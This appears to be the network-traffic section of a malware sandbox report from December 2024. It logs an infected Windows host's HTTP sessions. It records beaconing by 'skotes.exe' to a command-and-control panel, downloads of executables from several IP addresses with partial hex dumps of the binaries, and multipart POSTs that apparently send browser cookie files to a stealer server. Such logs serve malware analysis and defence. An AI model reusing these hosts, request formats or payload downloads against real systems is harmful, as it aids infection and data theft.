Dec 19, 2024 10:10:30.109977007 CET	1236	IN	Data Raw: 14 50 8d 84 24 3c 00 01 00 50 68 ff 7f 00 00 ff 35 18 14 4d 00 ff 15 68 c3 49 00 ff 74 24 14 b9 f0 13 4d 00 e8 59 40 00 00 8a 5c 24 11 ff 35 00 14 4d 00 68 18 14 4d 00 e8 be f1 ff ff 85 c0 0f 85 61 00 04 00 80 7c 24 12 01 0f 84 73 00 04 00 e8 59 Data Ascii: P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PIL$(m_^[]U4SVWj<Ihj8I54Ijc5XMh5XMMh
Dec 19, 2024 10:10:30.110013008 CET	1236	IN	Data Raw: c7 05 00 14 4d 00 03 00 00 00 8d 45 f0 50 8d 4d 90 e8 c5 00 00 00 8d 45 f0 b9 18 14 4d 00 50 e8 fa 78 00 00 8d 45 f0 83 ee 02 50 8d 4d 90 e8 a8 00 00 00 39 1d 1c 14 4d 00 0f 84 8d fd 03 00 85 f6 0f 88 a5 fd 03 00 8b 4d 0c e8 f3 33 00 00 8d 4e 01 Data Ascii: MEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MKEPM#;\|M"hM+M@_^[U;Q}BAM;
Dec 19, 2024 10:10:30.112931013 CET	1236	IN	Data Raw: 23 4d 00 89 1d 98 23 4d 00 89 1d 9c 23 4d 00 89 1d a0 23 4d 00 89 1d a4 23 4d 00 a3 a8 23 4d 00 89 1d ac 23 4d 00 89 1d b0 23 4d 00 89 1d b4 23 4d 00 c7 05 b8 23 4d 00 44 c9 49 00 89 1d bc 23 4d 00 89 1d c0 23 4d 00 89 1d c4 23 4d 00 a3 c8 23 4d Data Ascii: #M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M<I#M#M#M#MfNtL$(>T$(0h(IL$,D$(#MPL$tL$mqD$3PjVhIhI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49927	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:34.098692894 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017479001&unit=246122658369
Dec 19, 2024 10:10:35.434623957 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49928	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:35.561188936 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 19, 2024 10:10:36.897861004 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:36 GMT Content-Type: application/octet-stream Content-Length: 1716736 Last-Modified: Thu, 19 Dec 2024 08:26:05 GMT Connection: keep-alive ETag: "6763d89d-1a3200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 44 00 00 04 00 00 86 70 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$D `@ Dp`Ui`D @ @.rsrcD`2@.idata 6@ )8@giuvursf*:@cwujweuv `D@.taggant@D"@
Dec 19, 2024 10:10:36.897927046 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.897963047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.898097992 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.898133039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.898169041 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.898205996 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 19, 2024 10:10:36.898955107 CET	1236	IN	Data Raw: cd ec 73 33 f5 89 70 78 6c b8 72 f0 7c 6e 17 42 c8 45 0d 52 0f a3 1e 92 39 fe 3c 71 a6 43 ac 67 14 70 c6 d6 a3 61 ed 12 c4 39 37 48 93 a7 80 72 5f ff 50 42 1b f2 7f 8e 6e a1 75 8c 5e f7 bb 64 53 ea 60 32 f5 f5 64 2a 09 ce 53 88 78 c8 75 e3 2b 11 Data Ascii: s3pxlr\|nBER9<qCgpa97Hr_PBnu^dS`2dSxu+eW{!=rcb9emt}ta`aPmvacw!iXwQF}aDZ>b6\fvdRbv<~YZN;`s7C{4.ao)RX93R2jj$9lqbqx~jEe"-i
Dec 19, 2024 10:10:36.898989916 CET	1236	IN	Data Raw: d9 ed 5a 28 b1 ed 56 54 c8 18 d2 48 76 d0 5c c1 2f d8 60 4c fd a3 3e 51 3f 75 36 38 51 b0 66 33 2f d8 26 52 cd 90 22 35 c0 e3 e4 b0 51 ed 1a 32 2f 8c 5a 00 fd b4 0a 46 03 49 00 0c 29 d0 fe 69 ff d1 c6 ec 76 6c 6f ba 51 70 4e 33 ef c1 e6 e0 e7 28 Data Ascii: Z(VTHv\/`L>Q?u68Qf3/&R"5Q2/ZFI)ivloQpN3(i#T_\Lb$2f2gs'us/R4FvbqlAGbeXrUOskYJ^Ss[_6CL3i-"iv9lpitvvRQ\|JkgszxSbrsg
Dec 19, 2024 10:10:36.899028063 CET	1148	IN	Data Raw: 10 ca 63 39 fb a8 5a 65 1c 95 aa 32 64 14 6d c7 62 e3 58 00 21 fd 36 99 75 86 2d 11 02 08 07 96 0b d5 2c 03 63 69 38 77 de 87 87 65 4f c2 27 a9 1f f0 06 22 71 93 eb 14 5f e0 fc 14 0e 83 0a ed e7 fd 0e 41 5d 87 16 3b 60 3a c6 33 e9 5d 43 e4 ac 16 Data Ascii: c9Ze2dmbX!6u-,ci8weO'"q_A];`:3]Cyfb?"Mlu(w2~"U5{U7W"RcU2ok$-oG,=~W5=&QD"t;^`o9QX9qqu:Vm,c(@ox\+ta8-a]^
Dec 19, 2024 10:10:37.028033018 CET	1236	IN	Data Raw: 40 d7 66 85 7a e8 7b 73 3d 1f 7d 8e 6b 41 74 50 3c e5 7a 71 2c 15 a5 d0 2b e5 2e 30 6f 60 d7 58 7a 70 61 75 f3 e6 3b 77 73 e5 77 34 71 c2 75 61 77 e8 73 f4 3e ee 7a 83 77 04 76 76 72 40 cd 61 6f 28 77 68 ea fc 5c 50 3f c4 56 af ff 48 a9 54 72 f0 Data Ascii: @fz{s=}kAtP<zq,+.0o`Xzpau;wsw4quaws>zwvvr@ao(wh\P?VHTr=kiG}lCHww8Ssls`~pCs>.3_(.7Rp/h'>y5qyb}ywKkUlPllXGGBKMZF8JgcK]HI'?%~Fn8AGCM6u^$wy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49964	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:42.317349911 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017480001&unit=246122658369
Dec 19, 2024 10:10:43.656745911 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49974	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:43.854711056 CET	62	OUT	GET /files/burpin1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:10:45.176754951 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:44 GMT Content-Type: application/octet-stream Content-Length: 4438776 Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT Connection: keep-alive ETag: "675784f0-43baf8" Accept-Ranges: bytes Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`\|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
Dec 19, 2024 10:10:45.176878929 CET	1236	IN	Data Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1 Data Ascii: jZQ39FY~9F~fAfG@;F\|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A\|At>E;Ew6rE;Es,jPYYtlAj@ AEPjh5XAA3D$tlA
Dec 19, 2024 10:10:45.176914930 CET	1236	IN	Data Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5 Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
Dec 19, 2024 10:10:45.176966906 CET	1236	IN	Data Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
Dec 19, 2024 10:10:45.177002907 CET	1236	IN	Data Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW\|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
Dec 19, 2024 10:10:45.177038908 CET	1120	IN	Data Raw: 59 8b 4d fc 41 51 50 89 45 f8 8d 45 98 50 ff d3 3b 45 fc 77 40 ff d7 85 c0 75 3a 8b 86 bc e0 41 00 85 c0 74 25 8b 7d f8 57 50 ff 15 2c a1 41 00 85 c0 74 13 ff b6 bc e0 41 00 e8 14 6d 01 00 89 be bc e0 41 00 eb 16 57 eb 0e 8b 45 f8 89 86 bc e0 41 Data Ascii: YMAQPEEP;Ew@u:At%}WP,AtAmAWEAulYuAAAA9t;AuS0AG3jZGQl=AYAu:%AjXPAhP4A~XP
Dec 19, 2024 10:10:45.177109957 CET	1236	IN	Data Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83 Data Ascii: ujWPOG;~\|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
Dec 19, 2024 10:10:45.177160978 CET	1236	IN	Data Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75 Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ
Dec 19, 2024 10:10:45.177196026 CET	448	IN	Data Raw: 15 04 a1 41 00 5e c3 33 c0 5e c3 56 e8 ac fe ff ff 59 5e c3 53 8b 5c 24 0c 8b 03 83 63 04 00 66 83 20 00 56 8b 74 24 0c 57 6a 02 5f eb 08 66 3d 20 00 77 0a 03 f7 0f b7 06 66 85 c0 75 f0 66 83 3e 2c 75 0f eb 0b 66 85 c0 74 4d 66 3d 2c 00 74 47 03 Data Ascii: A^3^VY^S\$cf Vt$Wj_f= wfuf>,uftMf=,tGf={u0{t+uFf8}tF"Ff8{uPfu_^[L$Vj\%L$j/;~^VW\|$t$A~!FPPPt$
Dec 19, 2024 10:10:45.177231073 CET	1236	IN	Data Raw: ff 75 d0 ff 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9 Data Ascii: uuhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj
Dec 19, 2024 10:10:45.303800106 CET	1236	IN	Data Raw: 01 eb 2b ff 75 10 ff 75 fc eb 06 ff 75 10 ff 75 f8 57 e8 5c f6 ff ff 83 c4 0c 8d 4d a4 8a d8 e8 b9 ef ff ff ff 75 e0 e8 8b 58 01 00 8a c3 59 5f 5e 5b c9 c3 55 8b ec 83 ec 18 53 56 57 8b 7d 08 57 ff 15 f4 a0 41 00 57 8d 4d e8 8b d8 89 45 fc e8 5f Data Ascii: +uuuuW\MuXY_^[USVW}WAWME_39uVMD_f=\}tf=/uft_K]"wf=/tf=\tNf$wWYtEPAWAuEPWYYt3WYuWjj_[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49976	185.215.113.206	80	4132	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:43.914144039 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBK Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EGHCAKKEGCAAFHJJJDBK--
Dec 19, 2024 10:10:45.718524933 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:10:45.933880091 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file"------GCGHJEBGHJKEBFHIJDHC--
Dec 19, 2024 10:10:46.872289896 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49995	34.107.221.82	80	380	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:48.092029095 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:10:49.181864023 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 09:54:38 GMT Age: 83771 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50004	34.107.221.82	80	380	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:50.412470102 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 19, 2024 10:10:51.631457090 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Wed, 18 Dec 2024 11:58:44 GMT Age: 76327 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50019	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:54.777244091 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017481001&unit=246122658369
Dec 19, 2024 10:10:56.121941090 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50024	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:56.244889975 CET	61	OUT	GET /files/x3team/random.exe HTTP/1.1 Host: 31.41.244.11
